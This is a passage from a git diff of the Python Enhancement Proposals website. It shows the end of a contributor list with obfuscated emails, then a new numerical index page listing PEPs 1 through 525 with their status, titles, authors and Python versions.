Pablo Galindo Salgado | pablogsal at python.org
Patrick Maupin | pmaupin at gmail.com
Paul Barrett | barrett at stsci.edu
Paul Colomiets | paul at colomiets.name
Paul Everitt | pauleveritt at me.com
Paul F. Dubois | paul at pfdubois.com
Paul Ganssle | paul at ganssle.io
Paul Moore | p.f.moore at gmail.com
Paul Prescod | paul at prescod.net
Peter Astrand | astrand at lysator.liu.se
Peter Harris | scav at blueyonder.co.uk
Peter Moody | pmoody at google.com
Peter Schneider-Kamp | nowonder at nowonder.de
Petr Viktorin | encukou at gmail.com
Philip House | phouse512 at gmail.com
Philipp Angerer | phil.angerer at gmail.com
Philippe Ombredanne | pombredanne at nexb.com
Philippe PRADOS | python at prados.fr
Phillip J. Eby | pje at telecommunity.com
Pradeep Kumar Srinivasan | gohanpra at gmail.com
Pradyun Gedam | pradyunsg at gmail.com
R David Murray |
Ralf Gommers | ralf.gommers at gmail.com
Raymond Hettinger | python at rcn.com
Reid Kleckner | rnk at mit.edu
Rich Chiodo | rchiodo at microsoft.com
Richard Jones | richard at python.org
Richard Oudkerk | r.m.oudkerk at googlemail.com
Robert Collins | rbtcollins at hp.com
Robert Kuska | rkuska at redhat.com
Robert T. McGibbon | rmcgibbo at gmail.com
Roman Suzi | rnd at onego.ru
Ronald Oussoren | ronaldoussoren at mac.com
Russell Keith-Magee | russell at keith-magee.com
Ryan Gonzalez | rymg19 at gmail.com
Sam Gross | colesbury at gmail.com
Samuele Pedroni | pedronis at python.org
Savannah Ostrowski | savannahostrowski at gmail.com
Scott Gilbert | xscottg at yahoo.com
Sean Reifschneider | jafo-pep at tummy.com
Sebastian Kreft | skreft at deezer.com
Sebastián Ramírez | tiangolo at gmail.com
Sergey B Kirpichev | skirpichev at gmail.com
Serhiy Storchaka |
Seth Michael Larson | seth at python.org
Sébastien Eustace | sebastien at eustace.io
Shannon Zhu | szhu at fb.com
Shantanu Jain | hauntsaninja at gmail.com
Simon Cross | hodgestar at gmail.com
Skip Montanaro | skip at pobox.com
Stefan Behnel | stefan_ml at behnel.de
Stefan Krah | skrah at bytereef.org
Stefano Borini |
Stefano Rivera | stefanor at debian.org
Stepan Koltsov | yozh at mx1.ru
Stepan Sindelar | stepan.sindelar at oracle.com
Stephen J. Turnbull | stephen at xemacs.org
Stephen Rosen | sirosen0 at gmail.com
Steve Dower | steve.dower at python.org
Steven Bethard | steven.bethard at gmail.com
Steven D’Aprano | steve at pearwood.info
Steven Taschuk | staschuk at telusplanet.net
Steven Troxler | steven.troxler at gmail.com
Stéphane Bidoul | stephane.bidoul at gmail.com
Sumana Harihareswara | sh at changeset.nyc
Tal Einat | tal at python.org
Talin | viridia at gmail.com
Taneli Hukkinen |
Tarek Ziadé | tarek at ziade.org
Terence Way | terry at wayforward.net
Terry Reedy | tjreedy at udel.edu
The Python core team and community |
Thomas Bellman | bellman+pep-divmod at lysator.liu.se
Thomas Heller | theller at python.net
Thomas Kluyver | thomas at kluyver.me.uk
Thomas Wouters | thomas at python.org
Tian Gao | gaogaotiantian at hotmail.com
Till Varoquaux | till at fb.com
Tim Delaney | timothy.c.delaney at gmail.com
Tim Felgentreff | tim.felgentreff at oracle.com
Tim Peters | tim.peters at gmail.com
Tobias Kohn | kohnt at tobiaskohn.ch
Todd Rovito | rovitotv at gmail.com
Tomáš Orsava | tomas.n at orsava.cz
Tony Lownds | tony at lownds.com
Travis Oliphant | oliphant at ee.byu.edu
Trent Mick | trentm at activestate.com
Trishank Karthik Kuppusamy | karthik at trishank.com
Tzu-ping Chung | uranusjr at gmail.com
Victor Stinner | vstinner at python.org
Vikram Jayanthi | vikramjayanthi at google.com
Vinay Sajip | vinay_sajip at red-dove.com
Vincent Siles | vsiles at fb.com
Vladimir Diaz | vladimir.diaz at nyu.edu
W Isaac Carroll | icarroll at pobox.com
Walter Dörwald | walter at livinglogic.de
Wenzel Jakob | wenzel.jakob at epfl.ch
William Woodruff | william at yossarian.net
Yury Selivanov | yury at edgedb.com
Zac Hatfield-Dodds | zac at zhd.dev
Zachary Ware | zach at python.org
Zixuan James Li | p359101898 at gmail.com
Łukasz Langa | lukasz at python.org
\ No newline at end of file
diff --git a/numerical/index.html b/numerical/index.html new file mode 100644 index 00000000000..8780a7907e6 --- /dev/null +++ b/numerical/index.html @@ -0,0 +1,4113 @@
+

Python Enhancement Proposals


Numerical Index

Type/Status | PEP | Title | Authors | Python Version
PA | 1 | PEP Purpose and Guidelines | Barry Warsaw, Jeremy Hylton, David Goodger, Alyssa Coghlan
PA | 2 | Procedure for Adding New Modules | Brett Cannon, Martijn Faassen
PW | 3 | Guidelines for Handling Bug Reports | Jeremy Hylton
PA | 4 | Deprecation of Standard Modules | Brett Cannon, Martin von Löwis
PS | 5 | Guidelines for Language Evolution | Paul Prescod
PS | 6 | Bug Fix Releases | Aahz, Anthony Baxter
PA | 7 | Style Guide for C Code | Guido van Rossum, Barry Warsaw
PA | 8 | Style Guide for Python Code | Guido van Rossum, Barry Warsaw, Alyssa Coghlan
PW | 9 | Sample Plaintext PEP Template | Barry Warsaw
PA | 10 | Voting Guidelines | Barry Warsaw
PA | 11 | CPython platform support | Martin von Löwis, Brett Cannon
PA | 12 | Sample reStructuredText PEP Template | David Goodger, Barry Warsaw, Brett Cannon
PA | 13 | Python Language Governance | The Python core team and community
IA | 20 | The Zen of Python | Tim Peters
PW | 42 | Feature Requests | Jeremy Hylton
SF | 100 | Python Unicode Integration | Marc-André Lemburg | 2.0
IA | 101 | Doing Python Releases 101 | Barry Warsaw, Guido van Rossum
IS | 102 | Doing Python Micro Releases | Anthony Baxter, Barry Warsaw, Guido van Rossum
IW | 103 | Collecting information about git | Oleg Broytman
IF | 160 | Python 1.6 Release Schedule | Fred L. Drake, Jr. | 1.6
IF | 200 | Python 2.0 Release Schedule | Jeremy Hylton | 2.0
SF | 201 | Lockstep Iteration | Barry Warsaw | 2.0
SF | 202 | List Comprehensions | Barry Warsaw | 2.0
SF | 203 | Augmented Assignments | Thomas Wouters | 2.0
SR | 204 | Range Literals | Thomas Wouters | 2.0
SF | 205 | Weak References | Fred L. Drake, Jr. | 2.1
IW | 206 | Python Advanced Library | A.M. Kuchling
SF | 207 | Rich Comparisons | Guido van Rossum, David Ascher | 2.1
SF | 208 | Reworking the Coercion Model | Neil Schemenauer, Marc-André Lemburg | 2.1
SW | 209 | Multi-dimensional Arrays | Paul Barrett, Travis Oliphant | 2.2
SR | 210 | Decoupling the Interpreter Loop | David Ascher | 2.1
SR | 211 | Adding A New Outer Product Operator | Greg Wilson | 2.1
SR | 212 | Loop Counter Iteration | Peter Schneider-Kamp | 2.1
SD | 213 | Attribute Access Handlers | Paul Prescod | 2.1
SF | 214 | Extended Print Statement | Barry Warsaw | 2.0
SS | 215 | String Interpolation | Ka-Ping Yee | 2.1
IW | 216 | Docstring Format | Moshe Zadka
SF | 217 | Display Hook for Interactive Use | Moshe Zadka | 2.1
SF | 218 | Adding a Built-In Set Object Type | Greg Wilson, Raymond Hettinger | 2.2
SD | 219 | Stackless Python | Gordon McMillan | 2.1
IR | 220 | Coroutines, Generators, Continuations | Gordon McMillan
SF | 221 | Import As | Thomas Wouters | 2.0
SD | 222 | Web Library Enhancements | A.M. Kuchling | 2.1
SF | 223 | Change the Meaning of \x Escapes | Tim Peters | 2.0
SR | 224 | Attribute Docstrings | Marc-André Lemburg | 2.1
SR | 225 | Elementwise/Objectwise Operators | Huaiyu Zhu, Gregory Lielens | 2.1
IF | 226 | Python 2.1 Release Schedule | Jeremy Hylton | 2.1
SF | 227 | Statically Nested Scopes | Jeremy Hylton | 2.1
SW | 228 | Reworking Python’s Numeric Model | Moshe Zadka, Guido van Rossum
SF | 229 | Using Distutils to Build Python | A.M. Kuchling | 2.1
SF | 230 | Warning Framework | Guido van Rossum | 2.1
SR | 231 | __findattr__() | Barry Warsaw | 2.1
SF | 232 | Function Attributes | Barry Warsaw | 2.1
SD | 233 | Python Online Help | Paul Prescod | 2.1
SF | 234 | Iterators | Ka-Ping Yee, Guido van Rossum | 2.1
SF | 235 | Import on Case-Insensitive Platforms | Tim Peters | 2.1
SF | 236 | Back to the __future__ | Tim Peters | 2.1
SF | 237 | Unifying Long Integers and Integers | Moshe Zadka, Guido van Rossum | 2.2
SF | 238 | Changing the Division Operator | Moshe Zadka, Guido van Rossum | 2.2
SR | 239 | Adding a Rational Type to Python | Christopher A. Craig, Moshe Zadka | 2.2
SR | 240 | Adding a Rational Literal to Python | Christopher A. Craig, Moshe Zadka | 2.2
SS | 241 | Metadata for Python Software Packages | A.M. Kuchling
SW | 242 | Numeric Kinds | Paul F. Dubois | 2.2
SW | 243 | Module Repository Upload Mechanism | Sean Reifschneider | 2.1
SR | 244 | The directive statement | Martin von Löwis | 2.1
SR | 245 | Python Interface Syntax | Michel Pelletier | 2.2
SR | 246 | Object Adaptation | Alex Martelli, Clark C. Evans | 2.5
IF | 247 | API for Cryptographic Hash Functions | A.M. Kuchling
IF | 248 | Python Database API Specification v1.0 | Greg Stein, Marc-André Lemburg
IF | 249 | Python Database API Specification v2.0 | Marc-André Lemburg
SF | 250 | Using site-packages on Windows | Paul Moore | 2.2
IF | 251 | Python 2.2 Release Schedule | Barry Warsaw, Guido van Rossum | 2.2
SF | 252 | Making Types Look More Like Classes | Guido van Rossum | 2.2
SF | 253 | Subtyping Built-in Types | Guido van Rossum | 2.2
SR | 254 | Making Classes Look More Like Types | Guido van Rossum | 2.2
SF | 255 | Simple Generators | Neil Schemenauer, Tim Peters, Magnus Lie Hetland | 2.2
SR | 256 | Docstring Processing System Framework | David Goodger
IA | 257 | Docstring Conventions | David Goodger, Guido van Rossum
SR | 258 | Docutils Design Specification | David Goodger
SR | 259 | Omit printing newline after newline | Guido van Rossum | 2.2
SF | 260 | Simplify xrange() | Guido van Rossum | 2.2
SF | 261 | Support for “wide” Unicode characters | Paul Prescod | 2.2
SR | 262 | A Database of Installed Python Packages | A.M. Kuchling
SF | 263 | Defining Python Source Code Encodings | Marc-André Lemburg, Martin von Löwis | 2.3
SF | 264 | Future statements in simulated shells | Michael Hudson | 2.2
SR | 265 | Sorting Dictionaries by Value | Grant Griffin | 2.2
SW | 266 | Optimizing Global Variable/Attribute Access | Skip Montanaro | 2.3
SD | 267 | Optimized Access to Module Namespaces | Jeremy Hylton | 2.2
SR | 268 | Extended HTTP functionality and WebDAV | Greg Stein | 2.x
SD | 269 | Pgen Module for Python | Jonathan Riehl | 2.2
SR | 270 | uniq method for list objects | Jason Petrone | 2.2
SR | 271 | Prefixing sys.path by command line option | Frédéric B. Giacometti | 2.2
IF | 272 | API for Block Encryption Algorithms v1.0 | A.M. Kuchling
SF | 273 | Import Modules from Zip Archives | James C. Ahlstrom | 2.3
SF | 274 | Dict Comprehensions | Barry Warsaw | 2.7, 3.0
SR | 275 | Switching on Multiple Values | Marc-André Lemburg | 2.6
SR | 276 | Simple Iterator for ints | Jim Althoff | 2.3
SF | 277 | Unicode file name support for Windows NT | Neil Hodgson | 2.3
SF | 278 | Universal Newline Support | Jack Jansen | 2.3
SF | 279 | The enumerate() built-in function | Raymond Hettinger | 2.3
SD | 280 | Optimizing access to globals | Guido van Rossum | 2.3
SR | 281 | Loop Counter Iteration with range and xrange | Magnus Lie Hetland | 2.3
SF | 282 | A Logging System | Vinay Sajip, Trent Mick | 2.3
IF | 283 | Python 2.3 Release Schedule | Guido van Rossum | 2.3
SR | 284 | Integer for-loops | David Eppstein, Gregory Ewing | 2.3
SF | 285 | Adding a bool type | Guido van Rossum | 2.3
SD | 286 | Enhanced Argument Tuples | Martin von Löwis | 2.3
IA | 287 | reStructuredText Docstring Format | David Goodger
SW | 288 | Generators Attributes and Exceptions | Raymond Hettinger | 2.5
SF | 289 | Generator Expressions | Raymond Hettinger | 2.4
IA | 290 | Code Migration and Modernization | Raymond Hettinger
IS | 291 | Backward Compatibility for the Python 2 Standard Library | Neal Norwitz | 2.3
SF | 292 | Simpler String Substitutions | Barry Warsaw | 2.4
SF | 293 | Codec Error Handling Callbacks | Walter Dörwald | 2.3
SR | 294 | Type Names in the types Module | Oren Tirosh | 2.5
SR | 295 | Interpretation of multiline string constants | Stepan Koltsov | 3.0
SW | 296 | Adding a bytes Object Type | Scott Gilbert | 2.3
SR | 297 | Support for System Upgrades | Marc-André Lemburg | 2.6
SW | 298 | The Locked Buffer Interface | Thomas Heller | 2.3
SR | 299 | Special __main__() function in modules | Jeff Epler | 2.3
SF | 301 | Package Index and Metadata for Distutils | Richard Jones | 2.3
SF | 302 | New Import Hooks | Just van Rossum, Paul Moore | 2.3
SR | 303 | Extend divmod() for Multiple Divisors | Thomas Bellman | 2.3
SW | 304 | Controlling Generation of Bytecode Files | Skip Montanaro
SF | 305 | CSV File API | Kevin Altis, Dave Cole, Andrew McNamara, Skip Montanaro, Cliff Wells | 2.3
IW | 306 | How to Change Python’s Grammar | Michael Hudson, Jack Diederich, Alyssa Coghlan, Benjamin Peterson
SF | 307 | Extensions to the pickle protocol | Guido van Rossum, Tim Peters | 2.3
SF | 308 | Conditional Expressions | Guido van Rossum, Raymond Hettinger | 2.5
SF | 309 | Partial Function Application | Peter Harris | 2.5
SR | 310 | Reliable Acquisition/Release Pairs | Michael Hudson, Paul Moore | 2.4
SF | 311 | Simplified Global Interpreter Lock Acquisition for Extensions | Mark Hammond | 2.3
SD | 312 | Simple Implicit Lambda | Roman Suzi, Alex Martelli | 2.4
SR | 313 | Adding Roman Numeral Literals to Python | Mike Meyer | 2.4
SS | 314 | Metadata for Python Software Packages 1.1 | A.M. Kuchling, Richard Jones | 2.5
SR | 315 | Enhanced While Loop | Raymond Hettinger, W Isaac Carroll | 2.5
SD | 316 | Programming by Contract for Python | Terence Way
SR | 317 | Eliminate Implicit Exception Instantiation | Steven Taschuk | 2.4
SF | 318 | Decorators for Functions and Methods | Kevin D. Smith, Jim J. Jewett, Skip Montanaro, Anthony Baxter | 2.4
SR | 319 | Python Synchronize/Asynchronize Block | Michel Pelletier | 2.4
IF | 320 | Python 2.4 Release Schedule | Barry Warsaw, Raymond Hettinger, Anthony Baxter | 2.4
SW | 321 | Date/Time Parsing and Formatting | A.M. Kuchling | 2.4
SF | 322 | Reverse Iteration | Raymond Hettinger | 2.4
SD | 323 | Copyable Iterators | Alex Martelli | 2.5
SF | 324 | subprocess - New process module | Peter Astrand | 2.4
SR | 325 | Resource-Release Support for Generators | Samuele Pedroni | 2.4
SR | 326 | A Case for Top and Bottom Values | Josiah Carlson, Terry Reedy | 2.4
SF | 327 | Decimal Data Type | Facundo Batista | 2.4
SF | 328 | Imports: Multi-Line and Absolute/Relative | Aahz | 2.4, 2.5, 2.6
SR | 329 | Treating Builtins as Constants in the Standard Library | Raymond Hettinger | 2.4
SR | 330 | Python Bytecode Verification | Michel Pelletier | 2.6
SF | 331 | Locale-Independent Float/String Conversions | Christian R. Reis | 2.4
SR | 332 | Byte vectors and String/Unicode Unification | Skip Montanaro | 2.5
IF | 333 | Python Web Server Gateway Interface v1.0 | Phillip J. Eby
SW | 334 | Simple Coroutines via SuspendIteration | Clark C. Evans | 3.0
SR | 335 | Overloadable Boolean Operators | Gregory Ewing | 3.3
SR | 336 | Make None Callable | Andrew McClelland
SD | 337 | Logging Usage in the Standard Library | Michael P. Dubner | 2.5
SF | 338 | Executing modules as scripts | Alyssa Coghlan | 2.5
IW | 339 | Design of the CPython Compiler | Brett Cannon
SR | 340 | Anonymous Block Statements | Guido van Rossum
SF | 341 | Unifying try-except and try-finally | Georg Brandl | 2.5
SF | 342 | Coroutines via Enhanced Generators | Guido van Rossum, Phillip J. Eby | 2.5
SF | 343 | The “with” Statement | Guido van Rossum, Alyssa Coghlan | 2.5
SS | 344 | Exception Chaining and Embedded Tracebacks | Ka-Ping Yee | 2.5
SS | 345 | Metadata for Python Software Packages 1.2 | Richard Jones | 2.7
SW | 346 | User Defined (“with”) Statements | Alyssa Coghlan | 2.5
PF | 347 | Migrating the Python CVS to Subversion | Martin von Löwis
SR | 348 | Exception Reorganization for Python 3.0 | Brett Cannon
SR | 349 | Allow str() to return unicode strings | Neil Schemenauer | 2.5
IR | 350 | Codetags | Micah Elliott
SR | 351 | The freeze protocol | Barry Warsaw
SF | 352 | Required Superclass for Exceptions | Brett Cannon, Guido van Rossum | 2.5
SF | 353 | Using ssize_t as the index type | Martin von Löwis | 2.5
SS | 354 | Enumerations in Python | Ben Finney | 2.6
SR | 355 | Path - Object oriented filesystem paths | Björn Lindqvist | 2.5
IF | 356 | Python 2.5 Release Schedule | Neal Norwitz, Guido van Rossum, Anthony Baxter | 2.5
SF | 357 | Allowing Any Object to be Used for Slicing | Travis Oliphant | 2.5
SF | 358 | The “bytes” Object | Neil Schemenauer, Guido van Rossum | 2.6, 3.0
SW | 359 | The “make” Statement | Steven Bethard | 2.6
PF | 360 | Externally Maintained Packages | Brett Cannon
IF | 361 | Python 2.6 and 3.0 Release Schedule | Neal Norwitz, Barry Warsaw | 2.6, 3.0
SF | 362 | Function Signature Object | Brett Cannon, Jiwon Seo, Yury Selivanov, Larry Hastings | 3.3
SR | 363 | Syntax For Dynamic Attribute Access | Ben North
SW | 364 | Transitioning to the Py3K Standard Library | Barry Warsaw | 2.6
SR | 365 | Adding the pkg_resources module | Phillip J. Eby
SF | 366 | Main module explicit relative imports | Alyssa Coghlan | 2.6, 3.0
SS | 367 | New Super | Calvin Spealman, Tim Delaney | 2.6
SD | 368 | Standard image protocol and class | Lino Mastrodomenico | 2.6, 3.0
SW | 369 | Post import hooks | Christian Heimes | 2.6, 3.0
SF | 370 | Per user site-packages directory | Christian Heimes | 2.6, 3.0
SF | 371 | Addition of the multiprocessing package to the standard library | Jesse Noller, Richard Oudkerk | 2.6, 3.0
SF | 372 | Adding an ordered dictionary to collections | Armin Ronacher, Raymond Hettinger | 2.7, 3.1
IF | 373 | Python 2.7 Release Schedule | Benjamin Peterson | 2.7
PF | 374 | Choosing a distributed VCS for the Python project | Brett Cannon, Stephen J. Turnbull, Alexandre Vassalotti, Barry Warsaw, Dirkjan Ochtman
IF | 375 | Python 3.1 Release Schedule | Benjamin Peterson | 3.1
SF | 376 | Database of Installed Python Distributions | Tarek Ziadé | 2.7, 3.2
SR | 377 | Allow __enter__() methods to skip the statement body | Alyssa Coghlan | 2.7, 3.1
SF | 378 | Format Specifier for Thousands Separator | Raymond Hettinger | 2.7, 3.1
SW | 379 | Adding an Assignment Expression | Jervis Whitley | 2.7, 3.2
SF | 380 | Syntax for Delegating to a Subgenerator | Gregory Ewing | 3.3
SW | 381 | Mirroring infrastructure for PyPI | Tarek Ziadé, Martin von Löwis
SR | 382 | Namespace Packages | Martin von Löwis | 3.2
SF | 383 | Non-decodable Bytes in System Character Interfaces | Martin von Löwis | 3.1
SF | 384 | Defining a Stable ABI | Martin von Löwis | 3.2
PF | 385 | Migrating from Subversion to Mercurial | Dirkjan Ochtman, Antoine Pitrou, Georg Brandl
SS | 386 | Changing the version comparison module in Distutils | Tarek Ziadé
PA | 387 | Backwards Compatibility Policy | Benjamin Peterson
SF | 389 | argparse - New Command Line Parsing Module | Steven Bethard | 2.7, 3.2
SR | 390 | Static metadata for Distutils | Tarek Ziadé | 2.7, 3.2
SF | 391 | Dictionary-Based Configuration For Logging | Vinay Sajip | 2.7, 3.2
IF | 392 | Python 3.2 Release Schedule | Georg Brandl | 3.2
SF | 393 | Flexible String Representation | Martin von Löwis | 3.3
IA | 394 | The “python” Command on Unix-Like Systems | Kerrick Staley, Alyssa Coghlan, Barry Warsaw, Petr Viktorin, Miro Hrončok, Carol Willing
SW | 395 | Qualified Names for Modules | Alyssa Coghlan | 3.4
IW | 396 | Module Version Numbers | Barry Warsaw
SF | 397 | Python launcher for Windows | Mark Hammond, Martin von Löwis | 3.3
IF | 398 | Python 3.3 Release Schedule | Georg Brandl | 3.3
IF | 399 | Pure Python/C Accelerator Module Compatibility Requirements | Brett Cannon | 3.3
SD | 400 | Deprecate codecs.StreamReader and codecs.StreamWriter | Victor Stinner | 3.3
PR | 401 | BDFL Retirement | Barry Warsaw, Brett Cannon
SR | 402 | Simplified Package Layout and Partitioning | Phillip J. Eby | 3.3
SD | 403 | General purpose decorator clause (aka “@in” clause) | Alyssa Coghlan | 3.4
IF | 404 | Python 2.8 Un-release Schedule | Barry Warsaw | 2.8
SF | 405 | Python Virtual Environments | Carl Meyer | 3.3
SW | 406 | Improved Encapsulation of Import State | Alyssa Coghlan, Greg Slodkowicz | 3.4
PD | 407 | New release cycle and introducing long-term support versions | Antoine Pitrou, Georg Brandl, Barry Warsaw
SR | 408 | Standard library __preview__ package | Alyssa Coghlan, Eli Bendersky | 3.3
SF | 409 | Suppressing exception context | Ethan Furman | 3.3
SR | 410 | Use decimal.Decimal type for timestamps | Victor Stinner | 3.3
IS | 411 | Provisional packages in the Python standard library | Alyssa Coghlan, Eli Bendersky | 3.3
SF | 412 | Key-Sharing Dictionary | Mark Shannon | 3.3
PW | 413 | Faster evolution of the Python Standard Library | Alyssa Coghlan
SF | 414 | Explicit Unicode Literal for Python 3.3 | Armin Ronacher, Alyssa Coghlan | 3.3
SF | 415 | Implement context suppression with exception attributes | Benjamin Peterson | 3.3
SR | 416 | Add a frozendict builtin type | Victor Stinner | 3.3
SF | 417 | Including mock in the Standard Library | Michael Foord | 3.3
SF | 418 | Add monotonic time, performance counter, and process time functions | Cameron Simpson, Jim J. Jewett, Stephen J. Turnbull, Victor Stinner | 3.3
SD | 419 | Protecting cleanup statements from interruptions | Paul Colomiets | 3.3
SF | 420 | Implicit Namespace Packages | Eric V. Smith | 3.3
SF | 421 | Adding sys.implementation | Eric Snow | 3.3
SW | 422 | Simpler customisation of class creation | Alyssa Coghlan, Daniel Urban | 3.5
ID | 423 | Naming conventions and recipes related to packaging | Benoit Bryon
SF | 424 | A method for exposing a length hint | Alex Gaynor | 3.4
SF | 425 | Compatibility Tags for Built Distributions | Daniel Holth | 3.4
IW | 426 | Metadata for Python Software Packages 2.0 | Alyssa Coghlan, Daniel Holth, Donald Stufft
SF | 427 | The Wheel Binary Package Format 1.0 | Daniel Holth
SF | 428 | The pathlib module – object-oriented filesystem paths | Antoine Pitrou | 3.4
IF | 429 | Python 3.4 Release Schedule | Larry Hastings | 3.4
IF | 430 | Migrating to Python 3 as the default online documentation | Alyssa Coghlan
SS | 431 | Time zone support improvements | Lennart Regebro
SW | 432 | Restructuring the CPython startup sequence | Alyssa Coghlan, Victor Stinner, Eric Snow
SS | 433 | Easier suppression of file descriptor inheritance | Victor Stinner | 3.4
IA | 434 | IDLE Enhancement Exception for All Branches | Todd Rovito, Terry Reedy
SF | 435 | Adding an Enum type to the Python standard library | Barry Warsaw, Eli Bendersky, Ethan Furman | 3.4
SF | 436 | The Argument Clinic DSL | Larry Hastings | 3.4
SR | 437 | A DSL for specifying signatures, annotations and argument converters | Stefan Krah | 3.4
PS | 438 | Transitioning to release-file hosting on PyPI | Holger Krekel, Carl Meyer
SR | 439 | Inclusion of implicit pip bootstrap in Python installation | Richard Jones | 3.4
SF | 440 | Version Identification and Dependency Specification | Alyssa Coghlan, Donald Stufft
SF | 441 | Improving Python ZIP Application Support | Daniel Holth, Paul Moore | 3.5
SF | 442 | Safe object finalization | Antoine Pitrou | 3.4
SF | 443 | Single-dispatch generic functions | Łukasz Langa | 3.4
ID | 444 | Python Web3 Interface | Chris McDonough, Armin Ronacher
SF | 445 | Add new APIs to customize Python memory allocators | Victor Stinner | 3.4
SF | 446 | Make newly created file descriptors non-inheritable | Victor Stinner | 3.4
SD | 447 | Add __getdescriptor__ method to metaclass | Ronald Oussoren
SF | 448 | Additional Unpacking Generalizations | Joshua Landau | 3.5
PF | 449 | Removal of the PyPI Mirror Auto Discovery and Naming Scheme | Donald Stufft
SF | 450 | Adding A Statistics Module To The Standard Library | Steven D’Aprano | 3.4
SF | 451 | A ModuleSpec Type for the Import System | Eric Snow | 3.4
IF | 452 | API for Cryptographic Hash Functions v2.0 | A.M. Kuchling, Christian Heimes
SF | 453 | Explicit bootstrapping of pip in Python installations | Donald Stufft, Alyssa Coghlan
SF | 454 | Add a new tracemalloc module to trace Python memory allocations | Victor Stinner | 3.4
SR | 455 | Adding a key-transforming dictionary to collections | Antoine Pitrou | 3.5
SF | 456 | Secure and interchangeable hash algorithm | Christian Heimes | 3.4
IF | 457 | Notation For Positional-Only Parameters | Larry Hastings
SA | 458 | Secure PyPI downloads with signed repository metadata | Trishank Karthik Kuppusamy, Vladimir Diaz, Marina Moore, Lukas Puehringer, Joshua Lock, Lois Anne DeLong, Justin Cappos
SW | 459 | Standard Metadata Extensions for Python Software Packages | Alyssa Coghlan
SW | 460 | Add binary interpolation and formatting | Antoine Pitrou | 3.5
SF | 461 | Adding % formatting to bytes and bytearray | Ethan Furman | 3.5
PW | 462 | Core development workflow automation for CPython | Alyssa Coghlan
SR | 463 | Exception-catching expressions | Chris Angelico | 3.5
PF | 464 | Removal of the PyPI Mirror Authenticity API | Donald Stufft
SF | 465 | A dedicated infix operator for matrix multiplication | Nathaniel J. Smith | 3.5
SF | 466 | Network Security Enhancements for Python 2.7.x | Alyssa Coghlan | 2.7.9
S | 467 | Minor API improvements for binary sequences | Alyssa Coghlan, Ethan Furman | 3.13
SF | 468 | Preserving the order of **kwargs in a function. | Eric Snow | 3.6
SW | 469 | Migration of dict iteration code to Python 3 | Alyssa Coghlan | 3.5
PF | 470 | Removing External Hosting Support on PyPI | Donald Stufft
SF | 471 | os.scandir() function – a better and faster directory iterator | Ben Hoyt | 3.5
SR | 472 | Support for indexing with keyword arguments | Stefano Borini, Joseph Martinot-Lagarde | 3.6
SR | 473 | Adding structured data to built-in exceptions | Sebastian Kreft
PW | 474 | Creating forge.python.org | Alyssa Coghlan
SF | 475 | Retry system calls failing with EINTR | Charles-François Natali, Victor Stinner | 3.5
SF | 476 | Enabling certificate verification by default for stdlib http clients | Alex Gaynor | 2.7.9, 3.4.3, 3.5
SF | 477 | Backport ensurepip (PEP 453) to Python 2.7 | Donald Stufft, Alyssa Coghlan
IF | 478 | Python 3.5 Release Schedule | Larry Hastings | 3.5
SF | 479 | Change StopIteration handling inside generators | Chris Angelico, Guido van Rossum | 3.5
S | 480 | Surviving a Compromise of PyPI: End-to-end signing of packages | Trishank Karthik Kuppusamy, Vladimir Diaz, Justin Cappos, Marina Moore
PW | 481 | Migrate CPython to Git, Github, and Phabricator | Donald Stufft
IF | 482 | Literature Overview for Type Hints | Łukasz Langa
IF | 483 | The Theory of Type Hints | Guido van Rossum, Ivan Levkivskyi
SF | 484 | Type Hints | Guido van Rossum, Jukka Lehtosalo, Łukasz Langa | 3.5
SF | 485 | A Function for testing approximate equality | Christopher Barker | 3.5
SF | 486 | Make the Python Launcher aware of virtual environments | Paul Moore | 3.5
SF | 487 | Simpler customisation of class creation | Martin Teichmann | 3.6
SF | 488 | Elimination of PYO files | Brett Cannon | 3.5
SF | 489 | Multi-phase extension module initialization | Petr Viktorin, Stefan Behnel, Alyssa Coghlan | 3.5
SR | 490 | Chain exceptions at C level | Victor Stinner | 3.6
SD | 491 | The Wheel Binary Package Format 1.9 | Daniel Holth
SF | 492 | Coroutines with async and await syntax | Yury Selivanov | 3.5
SF | 493 | HTTPS verification migration tools for Python 2.7 | Alyssa Coghlan, Robert Kuska, Marc-André Lemburg | 2.7.12
IF | 494 | Python 3.6 Release Schedule | Ned Deily | 3.6
SF | 495 | Local Time Disambiguation | Alexander Belopolsky, Tim Peters | 3.6
IR | 496 | Environment Markers | James Polley
PR | 497 | A standard mechanism for backward compatibility | Ed Schofield
SF | 498 | Literal String Interpolation | Eric V. Smith | 3.6
SD | 499 | python -m foo should also bind ‘foo’ in sys.modules | Cameron Simpson, Chris Angelico, Joseph Jevnik | 3.10
SR | 500 | A protocol for delegating datetime methods to their tzinfo implementations | Alexander Belopolsky, Tim Peters
SW | 501 | General purpose template literal strings | Alyssa Coghlan, Nick Humrich | 3.12
IR | 502 | String Interpolation - Extended Discussion | Mike G. Miller | 3.6
SF | 503 | Simple Repository API | Donald Stufft
SW | 504 | Using the System RNG by default | Alyssa Coghlan | 3.6
SD | 505 | None-aware operators | Mark E. Haase, Steve Dower | 3.8
SF | 506 | Adding A Secrets Module To The Standard Library | Steven D’Aprano | 3.6
PR | 507 | Migrate CPython to Git and GitLab | Barry Warsaw
SF | 508 | Dependency specification for Python Software Packages | Robert Collins
SS | 509 | Add a private version to dict | Victor Stinner | 3.6
SR | 510 | Specialize functions with guards | Victor Stinner | 3.6
SR | 511 | API for code transformers | Victor Stinner | 3.6
PF | 512 | Migrating from hg.python.org to GitHub | Brett Cannon
IS | 513 | A Platform Tag for Portable Linux Built Distributions | Robert T. McGibbon, Nathaniel J. Smith
IA | 514 | Python registration in the Windows registry | Steve Dower
SF | 515 | Underscores in Numeric Literals | Georg Brandl, Serhiy Storchaka | 3.6
SR | 516 | Build system abstraction for pip/conda etc | Robert Collins, Nathaniel J. Smith
SF | 517 | A build-system independent format for source trees | Nathaniel J. Smith, Thomas Kluyver
SF | 518 | Specifying Minimum Build System Requirements for Python Projects | Brett Cannon, Nathaniel J. Smith, Donald Stufft
SF | 519 | Adding a file system path protocol | Brett Cannon, Koos Zevenhoven | 3.6
SF | 520 | Preserving Class Attribute Definition Order | Eric Snow | 3.6
SW | 521 | Managing global context via ‘with’ blocks in generators and coroutines | Nathaniel J. Smith | 3.6
SR | 522 | Allow BlockingIOError in security sensitive APIs | Alyssa Coghlan, Nathaniel J. Smith | 3.6
SF | 523 | Adding a frame evaluation API to CPython | Brett Cannon, Dino Viehland | 3.6
SF | 524 | Make os.urandom() blocking on Linux | Victor Stinner | 3.6
SF | 525 | Asynchronous Generators | Yury Selivanov | 3.6
